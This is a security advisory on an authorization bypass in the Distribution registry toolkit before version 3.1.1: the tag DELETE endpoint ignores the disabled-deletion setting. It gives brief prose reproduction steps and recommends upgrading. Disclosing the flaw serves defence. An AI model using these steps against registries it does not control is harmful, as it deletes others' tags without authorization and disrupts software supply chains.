Distribution Authorization Bypass Vulnerability Allowing Tag Deletion

A vulnerability in the Distribution toolkit, prior to version 3.1.1, allows for unauthorized deletion of tags from repositories. This issue arises because the DELETE /v2/<name>/manifests/<tag> endpoint bypasses the storage.delete.enabled: false configuration. As a result, any API client can remove tags, even when the operator has explicitly disabled deletion. The vulnerability is rooted in the fact that tag deletion does not consult the delete-enabled setting, allowing tags to be removed directly through the storage driver.

Impact

Exploitation of this vulnerability leads to an authorization bypass, allowing any client with network access to the registry to delete tags. This can disrupt supply chains by removing trusted tags from a registry, causing consumers to experience issues when pulling by tag.

Reproduction

To reproduce this vulnerability, use a Distribution configuration that disables deletions. After pushing a Docker image tag into the registry, the tag can be deleted using the DELETE /v2/<name>/manifests/<tag> endpoint, despite the deletion being disabled in the configuration.

Remediation

Users should update to Distribution version 3.1.1 or later.